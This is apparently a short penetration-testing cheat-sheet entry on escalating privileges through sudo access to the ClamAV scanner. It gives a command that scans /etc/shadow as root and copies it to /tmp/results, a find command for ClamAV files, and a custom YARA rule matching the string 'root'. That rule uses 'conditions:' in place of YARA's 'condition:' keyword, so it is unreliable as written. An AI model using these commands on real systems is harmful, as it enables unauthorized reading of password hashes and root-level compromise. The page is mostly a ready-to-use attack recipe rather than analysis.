Sudo ClamAV Privilege Escalation
Sudo clamscan command might be vulnerable to privilege escalation (PrivEsc).
sudo /usr/bin/clamscan /etc/shadow --copy=/tmp/results
Copied!find / -name "clam*" 2>/dev/null
Copied!# /var/lib/clamav/test.yara
rule test
{
strings:
$string = "root"
conditions:
$string
}
Copied!Last updated
